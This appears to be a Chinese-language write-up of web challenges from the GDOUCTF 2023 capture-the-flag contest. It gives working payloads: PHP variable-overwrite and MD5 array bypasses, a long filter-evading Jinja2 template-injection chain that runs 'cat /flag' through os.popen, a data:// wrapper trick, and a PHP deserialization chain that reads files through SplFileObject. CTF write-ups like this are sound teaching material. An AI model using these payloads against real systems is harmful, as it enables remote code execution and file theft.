ctf题目解析（GDOUCTF web部分题解 2023）

时间2025-05-02 09:28:05分类IT科技浏览4418

导读：hate eat snake 前端小游戏，初始页面不能F12和Ctrl+R。可以右键，但是源码界面（右键后）可以F12控制台。...

hate eat snake

前端小游戏，初始页面不能F12和Ctrl+R 。可以右键，但是源码界面（右键后）可以F12控制台。

先玩死自己

然后在源码界面输入这个derectkey = 40 ，这样之后等一会，应该是一分钟。

然后回到主页面，点击空格。

受不了一点

源码：

<?php error_reporting(0); header("Content-type:text/html;charset=utf-8"); if(isset($_POST[gdou])&&isset($_POST[ctf])){ $b=$_POST[ctf]; $a=$_POST[gdou]; if($_POST[gdou]!=$_POST[ctf] && md5($a)===md5($b)){ if(isset($_COOKIE[cookie])){ if ($_COOKIE[cookie]==j0k3r){ if(isset($_GET[aaa]) && isset($_GET[bbb])){ $aaa=$_GET[aaa]; $bbb=$_GET[bbb]; if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){ $give = cancanwordflag; $get =hacker!; if(!isset($_GET[flag]) && !isset($_POST[flag])){ die($give); } if($_POST[flag] === flag || $_GET[flag] === flag){ die($get); } foreach ($_POST as $key => $value) { $$key = $value; } foreach ($_GET as $key => $value) { $$key = $$value; } echo $f1ag; }else{ echo "洗洗睡吧"; } }else{ echo "行不行啊细狗"; } } } else { echo 菜菜; } }else{ echo "就这?"; } }else{ echo "别来沾边"; } ?>

简单变量覆盖

payload：

?aaa=114514a&bbb=114514b&flag=a&a=flag //GET ?aaa=114514a&bbb=114514b&flag=1 //或者 ?aaa=114514a&bbb=114514b&flag=1&1=2&2=flag //或者 gdou[]=1&ctf[]=2 //POST cookie=j0k3r //COOKIE

EZ WEB

源码有提示。

访问/src

PUT方法在==/super-secret-route-nobody-will-guess==目录下随便传参得到flag 。

<ez_ze>

输入{%%},一顿错误操作发现是SSTI ，jinja2.

{%print(7*7)%}

过滤了： . _ [] " \ {{

https://www.yuque.com/zouyii/xwt9cw/gh2awwnmsomiu0p7

{%%0cset%0czero%0c=%0c(self|int)%0c%}{%%0cset%0cone%0c=%0c(zero**zero)|int%0c%}{%%0cset%0ctwo%0c=%0c(zero-one-one)|abs%0c%}{%%0cset%0cfour%0c=%0c(two*two)|int%0c%}{%%0cset%0cfive%0c=%0c(two*two*two)-one-one-one%0c%}{%%0cset%0cthree%0c=%0cfive-one-one%0c%}{%%0cset%0cnine%0c=%0c(two*two*two*two-five-one-one)%0c%}{%%0cset%0cseven%0c=%0c(zero-one-one-five)|abs%0c%}{%%0cset%0cspace%0c=%0cself|string|min%0c%}{%%0cset%0cpoint%0c=%0cself|float|string|min%0c%}{%%0cset%0cc%0c=%0cdict(c=aa)|reverse|first%0c%}{%%0cset%0cbfh%0c=%0cself|string|urlencode|first%0c%}{%%0cset%0cbfhc%0c=%0cbfh~c%0c%}{%%0cset%0cslas%0c=%0cbfhc%((four~seven)|int)%0c%}{%%0cset%0cyin%0c=%0cbfhc%((three~nine)|int)%0c%}{%%0cset%0cxhx%0c=%0cbfhc%((nine~five)|int)%0c%}{%%0cset%0cright%0c=%0cbfhc%((four~one)|int)%0c%}{%%0cset%0cleft%0c=%0cbfhc%((four~zero)|int)%0c%}{%%0cset%0cbut%0c=%0cdict(buil=aa,tins=dd)|join%0c%}{%%0cset%0cimp%0c=%0cdict(imp=aa,ort=dd)|join%0c%}{%%0cset%0cpon%0c=%0cdict(po=aa,pen=dd)|join%0c%}{%%0cset%0cso%0c=%0cdict(o=aa,s=dd)|join%0c%}{%%0cset%0cca%0c=%0cdict(ca=aa,t=dd)|join%0c%}{%%0cset%0cflg%0c=%0cdict(fl=aa,ag=dd)|join%0c%}{%%0cset%0cev%0c=%0cdict(ev=aa,al=dd)|join%0c%}{%%0cset%0cred%0c=%0cdict(re=aa,ad=dd)|join%0c%}{%%0cset%0cbul%0c=%0cxhx~xhx~but~xhx~xhx%0c%}{%%0cset%0cini%0c=%0cdict(ini=aa,t=bb)|join%0c%}{%%0cset%0cglo%0c=%0cdict(glo=aa,bals=bb)|join%0c%}{%%0cset%0citm%0c=%0cdict(ite=aa,ms=bb)|join%0c%}{%%0cset%0cpld%0c=%0cxhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right%0c%}{%%0cfor%0cf,v%0cin%0c(self|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))()%0c%}{%%0cif%0cf%0c==%0cbul%0c%}{%%0cfor%0ca,b%0cin%0c(v|attr(itm))()%0c%}{%%0cif%0ca%0c==%0cev%0c%}{%print(b(pld))%}{%%0cendif%0c%}{%%0cendfor%0c%}{%%0cendif%0c%}{%%0cendfor%0c%} 注意： {%print(%0cb(pld)%0c)%}把{{b(pld)}}换掉了 # 首先构造出所需的数字: {% set zero = (self|int) %} # 0, 也可以使用lenght过滤器获取数字 {% set one = (zero**zero)|int %} # 1 {% set two = (zero-one-one)|abs %} # 2 {% set four = (two*two)|int %} # 4 {% set five = (two*two*two)-one-one-one %} # 5 {% set three = five-one-one %} # 3 {% set nine = (two*two*two*two-five-one-one) %} # 9 {% set seven = (zero-one-one-five)|abs %} # 7 # 构造出所需的各种字符与字符串: {% set space = self|string|min %} # 空格 {% set point = self|float|string|min %} # . {% set c = dict(c=aa)|reverse|first %} # 字符 c {% set bfh = self|string|urlencode|first %} # 百分号 % {% set bfhc = bfh~c %} # 这里构造了%c, 之后可以利用这个%c构造任意字符。~用于字符连接 {% set slas = bfhc%((four~seven)|int) %} # 使用%c构造斜杠 / {% set yin = bfhc%((three~nine)|int) %} # 使用%c构造引号 {% set xhx = bfhc%((nine~five)|int) %} # 使用%c构造下划线 _ {% set right = bfhc%((four~one)|int) %} # 使用%c构造右括号 ) {% set left = bfhc%((four~zero)|int) %} # 使用%c构造左括号 ( {% set but = dict(buil=aa,tins=dd)|join %} # builtins {% set imp = dict(imp=aa,ort=dd)|join %} # import {% set pon = dict(po=aa,pen=dd)|join %} # popen {% set so = dict(o=aa,s=dd)|join %} # os {% set ca = dict(ca=aa,t=dd)|join %} # cat {% set l = dict(l=aa,s=dd)|join %} #ls //{%%0cset%0cls%0c=%0cdict(l=aa,s=dd)|join%0c%} {% set flg = dict(fl=aa,ag=dd)|join %} # flag {% set ev = dict(ev=aa,al=dd)|join %} # eval {% set red = dict(re=aa,ad=dd)|join %} # read {% set bul = xhx~xhx~but~xhx~xhx %} # __builtins__ {% set ini = dict(ini=aa,t=bb)|join %} # init {% set glo = dict(glo=aa,bals=bb)|join %} # globals {% set itm = dict(ite=aa,ms=bb)|join %} # items # 将上面构造的字符或字符串拼接起来构造出 __import__(os).popen(cat /flag).read(): {% set pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %} # 然后将上面构造的各种变量添加到SSTI万能payload里面就行了: {% for f,v in (whoami|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %} # globals {% if f == bul %} {% for a,b in (v|attr(itm))() %} # builtins {% if a == ev %} # eval {{b(pld)}} # eval("__import__(os).popen(cat /flag).read()") {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}

只能hackerbar发包，name=payload 。 //POST

补一下题

泄露的伪装

先拿dirsearch扫一下。

test.txt

<?php error_reporting(0); if(isset($_GET[cxk])){ $cxk=$_GET[cxk]; if(file_get_contents($cxk)=="ctrl"){ echo $flag; }else{ echo "娲楁礂鐫″惂"; } }else{ echo "nononoononoonono"; } ?>

www.rar 。6 ，玩这么花[goutou] 。

<?php error_reporting(0); if(isset($_GET[cxk])){ $cxk=$_GET[cxk]; if(file_get_contents($cxk)=="ctrl"){ echo $flag; }else{ echo "洗洗睡吧"; } }else{ echo "nononoononoonono"; } ?> payload： ?cxk=data://text/plain,ctrl

反方向的钟

源码

<?php error_reporting(0); highlight_file(__FILE__); // flag.php class teacher{ public $name; public $rank; private $salary; public function __construct($name,$rank,$salary = 10000){ $this->name = $name; $this->rank = $rank; $this->salary = $salary; } } class classroom{ public $name; public $leader; public function __construct($name,$leader){ $this->name = $name; $this->leader = $leader; } public function hahaha(){ if($this->name != one class or $this->leader->name != ing or $this->leader->rank !=department){ return False; } else{ return True; } } } class school{ public $department; public $headmaster; public function __construct($department,$ceo){ $this->department = $department; $this->headmaster = $ceo; } public function IPO(){ if($this->headmaster == ong){ echo "Pretty Good ! Ctfer!\n"; echo new $_POST[a]($_POST[b]); } } public function __wakeup(){ if($this->department->hahaha()) { $this->IPO(); } } } if(isset($_GET[d])){ unserialize(base64_decode($_GET[d])); } ?>

链子：

school::__wakeup()–>classroom::hahaha()–>school::IPO()

//poc <?php 源码，不动 $j17 = new school(new classroom(one class,new teacher(ing,department)),ong); #echo serialize($j17); #echo urlencode(serialize($j17)); echo urlencode(base64_encode(serialize($j17))); ?>

payload：

?d=Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9 a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php //POST ，直接用php的内置类SplFileObject来读取文件内容